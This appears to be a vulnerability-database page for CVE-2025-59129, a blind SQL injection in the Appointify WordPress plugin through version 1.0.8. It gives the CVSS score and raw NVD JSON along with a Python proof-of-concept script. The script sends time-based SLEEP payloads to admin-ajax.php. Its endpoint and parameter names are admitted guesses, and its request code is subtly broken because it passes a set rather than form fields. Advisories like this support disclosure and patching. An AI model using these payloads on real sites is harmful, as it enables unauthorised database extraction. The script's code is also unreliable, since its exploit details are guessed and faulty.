Security Vulnerability Report
中文
CVE-2025-59129 CVSS 7.6 HIGH

CVE-2025-59129

Published: 2025-12-30 17:15:42
Last Modified: 2026-04-23 15:34:02

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in appointify Appointify appointify allows Blind SQL Injection.This issue affects Appointify: from n/a through <= 1.0.8.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Appointify WordPress插件 <= 1.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59129 Blind SQL Injection PoC for WordPress Appointify Plugin # Target: WordPress site with Appointify plugin <= 1.0.8 import requests import time target_url = "http://target-site.com/wp-admin/admin-ajax.php" # Blind SQL Injection payload to extract database version def test_blind_sql_injection(): # Example payload - time-based blind SQL injection # Modify the 'id' or other parameter based on actual vulnerable endpoint # True condition - should respond quickly true_payload = "1' AND IF(1=1, SLEEP(0), SLEEP(5)) AND '1'='1" # False condition - should delay response false_payload = "1' AND IF(1=2, SLEEP(0), SLEEP(5)) AND '1'='1" headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded" } # Test with true condition start_time = time.time() response = requests.post(target_url, data={f"action=appointify_action&param={true_payload}"}, headers=headers, timeout=10) true_response_time = time.time() - start_time # Test with false condition start_time = time.time() response = requests.post(target_url, data={f"action=appointify_action&param={false_payload}"}, headers=headers, timeout=10) false_response_time = time.time() - start_time print(f"True condition response time: {true_response_time}s") print(f"False condition response time: {false_response_time}s") if false_response_time > true_response_time + 3: print("[+] Blind SQL Injection vulnerability confirmed!") return True return False if __name__ == "__main__": test_blind_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59129", "sourceIdentifier": "[email protected]", "published": "2025-12-30T17:15:42.397", "lastModified": "2026-04-23T15:34:02.410", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in appointify Appointify appointify allows Blind SQL Injection.This issue affects Appointify: from n/a through <= 1.0.8."}, {"lang": "es", "value": "Una vulnerabilidad de Neutralización Incorrecta de Elementos Especiales utilizados en un Comando SQL ('Inyección SQL') en Appointify permite Inyección SQL Ciega. Este problema afecta a Appointify: desde n/a hasta 1.0.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/appointify/vulnerability/wordpress-appointify-plugin-1-0-8-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}